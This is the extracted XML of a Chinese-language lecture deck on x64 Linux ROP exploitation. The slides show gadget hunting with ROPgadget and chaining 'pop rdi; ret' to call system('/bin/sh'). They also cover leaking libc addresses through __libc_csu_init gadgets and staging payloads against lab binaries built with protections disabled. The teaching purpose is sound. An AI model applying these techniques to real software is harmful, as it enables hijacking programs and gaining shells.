              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>$ run &lt; payload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365" y="1388895"/>
            <a:ext cx="7401636" cy="39963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6" y="5454757"/>
            <a:ext cx="6304762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0x01 linux_x64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示例程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level3.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> –d level3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exp5.py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1" y="2690267"/>
            <a:ext cx="5923809" cy="15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05" y="4195029"/>
            <a:ext cx="3647619" cy="24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040" y="3947409"/>
            <a:ext cx="6228571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0x02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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示例程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level4.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level4.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>systemaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数，该函数会打印出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地址，因此可以暂时不考虑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的问题，借助该函数直接可以获取到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函数地址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Linux_x64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过寄存器来传参数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system(“/bin/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时，需要将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>直线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>”/bin/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所在的地址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因此需要寻找 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>“pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>rdi,ret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这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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041" y="2984253"/>
            <a:ext cx="5257143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0x02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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常用知名工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROPEME: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github.com/packz/ropeme</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Ropper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github.com/sashs/Ropper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ROPgadget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github.com/JonathanSalwan/ROPgadget/tree/master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>++: 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github.com/0vercl0k/rp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本实验采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ROPgadget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ROPGadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>搜索一下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>level4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pop ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>gadgets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923" y="3253812"/>
            <a:ext cx="642857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0x02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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16" y="140254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”pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>rdi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ret”gadgets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exp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" y="1927047"/>
            <a:ext cx="7238095" cy="46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167" y="1927047"/>
            <a:ext cx="5247619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0x02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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16" y="140254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”pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>rdi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ret”gadgets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执行结果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16" y="1900884"/>
            <a:ext cx="6000000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994" y="7698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0x02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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16" y="140254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” pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ; pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ; call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>完成目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>赋值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>赋值为“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的地址，最后再调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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发现只有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中才存在这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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exp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8107"/>
            <a:ext cx="7438095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994" y="7698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0x02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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16" y="140254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” pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ; pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ; call 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” gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>exp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82" y="1840256"/>
            <a:ext cx="7457143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41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0x00 ASLR Configure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252" y="1187356"/>
            <a:ext cx="11682482" cy="5418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you can configure ASLR in Linux using the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proc/sys/kernel/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randomize_va_space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interface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following values are supported:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0 – No randomization. Everything is static.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1 – Conservative randomization. Shared libraries, stack, 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(), VDSO and heap are randomized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2 – Full randomization. In addition to elements listed in the previous point, memory managed through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>() is also randomized.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994" y="7698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0x02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工具寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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16" y="140254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” pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ; pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ; call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>rax”gadgets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>执行结果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18" y="1982133"/>
            <a:ext cx="6076190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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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level3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>level4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的程序都留了一些辅助函数在程序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因此不用考虑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level5.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中没有任何辅助函数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>先泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内存信息，找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的值，然后再传递“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段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最后调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>原程序使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>read()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数，我们可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>去输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>write.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址，从而计算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>出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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内存中的地址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72" y="4505619"/>
            <a:ext cx="4580952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638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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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问题在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的参数应该如何传递，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>x64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个参数不是保存在栈中，而是通过寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>传值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p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lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只要程序调用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>都用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>libc_csu_init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行初始化操作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objdumpe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> –d leve5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8" y="991333"/>
            <a:ext cx="9990476" cy="58666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467" y="16929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65" y="1144588"/>
            <a:ext cx="7247619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638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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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87" y="112224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payload1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44467" y="16929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6" y="1692970"/>
            <a:ext cx="9047619" cy="46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91" y="1325563"/>
            <a:ext cx="6647619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7" y="908745"/>
            <a:ext cx="11066667" cy="4476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743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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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87" y="112224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payload1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44467" y="16929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666" y="5396932"/>
            <a:ext cx="9114286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743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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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87" y="112224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payload2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在内存中的地址后，就可以计算出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在内存中的地址了。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接着构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>read()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址以及“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读入到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段内存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44467" y="16929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71" y="2610313"/>
            <a:ext cx="8961905" cy="4076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74" y="2610313"/>
            <a:ext cx="8666667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743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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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87" y="112224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payload3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload3,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数执行“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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址保存在了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段首地址上，“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的地址保存在了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段首地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节上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44467" y="16929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5" y="2664054"/>
            <a:ext cx="8990476" cy="28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5" y="2664054"/>
            <a:ext cx="10123809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743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0x03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets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87" y="1122240"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr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344467" y="16929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745" y="1122240"/>
            <a:ext cx="6390476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0x04 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>总结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简单介绍了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的基本原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用技巧还有很多未能详尽。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以上的例子都是在本地进行，和真实的漏洞利用场景还是有区别的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以上例子都未能绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Stack Protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，如何绕过还有待探讨和学习。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65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wooyun.jozxing.cc/static/drops/papers-7551.html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wooyun.jozxing.cc/static/drops/tips-6597.html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www.tuicool.com/articles/vIBbE3f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m.bobao.360.cn/learning/detail/3298.html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7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0x01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567"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 程序流劫持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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -o level1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>level1.c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本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>实验的前提：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、栈保护（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Stack Protector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ASLR</a:t>
            </a:r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echo </a:t>
            </a:r>
